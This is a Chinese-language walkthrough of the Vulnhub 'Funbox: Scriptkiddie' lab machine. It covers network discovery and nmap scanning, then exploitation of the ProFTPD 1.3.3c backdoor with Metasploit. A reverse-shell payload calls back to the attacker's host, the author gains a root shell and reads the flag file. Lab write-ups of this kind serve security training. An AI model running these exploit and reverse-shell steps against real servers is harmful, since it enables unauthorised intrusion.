Funbox
识别目标主机的IP地址
靶机地址:http://www.vulnhub.com/entry/funbox-scriptkiddie,725/
(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.117.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:0f:0c:75 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.134 08:00:27:79:a1:cf 1 60 PCS Systemtechnik GmbH
利用Kali Linux内置的netdiscover工具识别目标主机的IP地址为192.168.56.134
NMAP 扫描
─(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.134 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 07:34 EDT
Nmap scan report for bogon (192.168.56.134)
Host is up (0.00024s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:0e:30:35:3b:ef:43:44:f5:1c:d7:c6:58:64:09:92 (RSA)
| 256 c2:d8:bd:62:bf:13:89:28:f8:61:e0:a6:c4:f7:a5:bf (ECDSA)
|_ 256 12:60:6e:58:ee:f2:bd:9c:ff:b0:35:05:83:08:71:b8 (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=funbox11
| Not valid before: 2021-07-19T16:52:14
|_Not valid after: 2031-07-17T16:52:14
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: funbox11, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Funbox: Scriptkiddie
|_http-generator: WordPress 5.7.2
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL RESP-CODES TOP CAPA
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE LOGINDISABLEDA0001 more have capabilities ID listed SASL-IR LITERAL+ Pre-login post-login LOGIN-REFERRALS OK IMAP4rev1 ENABLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:79:A1:CF (Oracle VirtualBox virtual NIC)
Service Info: Hosts: funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-10-24T11:34:35
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: funbox11
| NetBIOS computer name: FUNBOX11\x00
| Domain name: \x00
| FQDN: funbox11
|_ System time: 2022-10-24T13:34:35+02:00
|_nbstat: NetBIOS name: FUNBOX11, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
信息收集和漏洞挖掘
根据NMAP扫描的结果,由于目标主机运行FTP服务,因此自然的看一下是否允许匿名访问
─(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ ftp 192.168.56.134
Connected to 192.168.56.134.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.134]
Name (192.168.56.134:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
结果是不允许匿名访问你,但是根据banner以及NMAP扫描的结果,知道FTP服务的版本为1.3.3C ProFTPd,看一下是否有相关的漏洞,尤其是高危漏洞。
$ searchsploit proftpd 1.3.3c
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdo | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Executio | linux/remote/16921.rb
------------------------------------------- ---------------------------------
结果是积极的,而且用ruby写的模块,就
感觉metasploit有相应的模块
─(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v6.2.9-dev ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
msf6 > search proftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
2 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
3 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
4 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
5 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://githu
b.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.56.134
RHOSTS => 192.168.56.134
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[-] 192.168.56.134:21 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.134 yes The target host(s), see https://githu
b.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.56.101:5555
[*] 192.168.56.134:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iINNRrLEUMN9Wbdm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iINNRrLEUMN9Wbdm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.101:5555 -> 192.168.56.134:43318) at 2022-10-24 07:42:38 -0400
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
which python
/usr/bin/python
python -c import 'pty;pty.spawn("/bin/bash")'
File "<string>", line 1
import
^
SyntaxError: invalid syntax
python -c 'import pty;pty.spawn("/bin/bash")'
root@funbox11:/# ls -alh
ls -alh
total 96K
drwxr-xr-x 23 root root 4.0K Jul 19 2021 .
drwxr-xr-x 23 root root 4.0K Jul 19 2021 ..
drwxr-xr-x 2 root root 4.0K Jul 19 2021 bin
drwxr-xr-x 3 root root 4.0K Jul 19 2021 boot
drwxr-xr-x 18 root root 3.8K Oct 24 13:30 dev
drwxr-xr-x 100 root root 4.0K Jul 19 2021 etc
drwxr-xr-x 3 root root 4.0K Jul 19 2021 home
lrwxrwxrwx 1 root root 33 Jul 19 2021 initrd.img -> boot/initrd.img-4.4.0-210-generic
lrwxrwxrwx 1 root root 33 Jul 19 2021 initrd.img.old -> boot/initrd.img-4.4.0-186-generic
drwxr-xr-x 22 root root 4.0K Jul 19 2021 lib
drwxr-xr-x 2 root root 4.0K Jul 19 2021 lib64
drwx------ 2 root root 16K Jul 19 2021 lost+found
drwxr-xr-x 3 root root 4.0K Jul 19 2021 media
drwxr-xr-x 2 root root 4.0K Aug 10 2020 mnt
drwxr-xr-x 2 root root 4.0K Aug 10 2020 opt
dr-xr-xr-x 130 root root 0 Oct 24 13:30 proc
drwx------ 4 root root 4.0K Jul 20 2021 root
drwxr-xr-x 26 root root 920 Oct 24 13:30 run
drwxr-xr-x 2 root root 12K Jul 19 2021 sbin
drwxr-xr-x 2 root root 4.0K Jul 19 2021 snap
drwxr-xr-x 2 root root 4.0K Aug 10 2020 srv
dr-xr-xr-x 13 root root 0 Oct 24 13:30 sys
drwxrwxrwt 9 root root 4.0K Oct 24 13:39 tmp
drwxr-xr-x 10 root root 4.0K Jul 19 2021 usr
drwxr-xr-x 14 root root 4.0K Jul 19 2021 var
lrwxrwxrwx 1 root root 30 Jul 19 2021 vmlinuz -> boot/vmlinuz-4.4.0-210-generic
lrwxrwxrwx 1 root root 30 Jul 19 2021 vmlinuz.old -> boot/vmlinuz-4.4.0-186-generic
root@funbox11:/# cd /root
cd /root
root@funbox11:/root# ls -alh
ls -alh
total 48K
drwx------ 4 root root 4.0K Jul 20 2021 .
drwxr-xr-x 23 root root 4.0K Jul 19 2021 ..
-rw------- 1 root root 5 Jul 20 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwx------ 2 root root 4.0K Jul 19 2021 .cache
-rw------- 1 root root 149 Jul 20 2021 .mysql_history
drwxr-xr-x 2 root root 4.0K Jul 19 2021 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 2.3K Jul 20 2021 root.txt
-rw------- 1 root root 4.6K Jul 20 2021 .viminfo
-rw-r--r-- 1 root root 167 Oct 24 13:30 .wget-hsts
root@funbox11:/root# cat root.txt
cat root.txt
$$$$$$$$\ $$\
$$ _____| $$ |
$$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
$$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__|
$$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$\
$$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__|
\__| \______/ \__| \__|\_______/ \______/ \__/ \__|
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\
$$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__|
$$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\
\$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\
\____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ |
$$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$< $$ |$$ | $$ |$$ | $$ |$$ |$$ ____|
\$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\
\______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______|
$$ |
$$ |
\__|
Please, tweet this to: @0815R2d2
Thank you...
root@funbox11:/root#
很容易就拿到root!!!
标签:__,Funbox,Jul,unix,Vulnhub,xr,靶机,root,2021 From: https://www.cnblogs.com/jason-huawen/p/16823185.html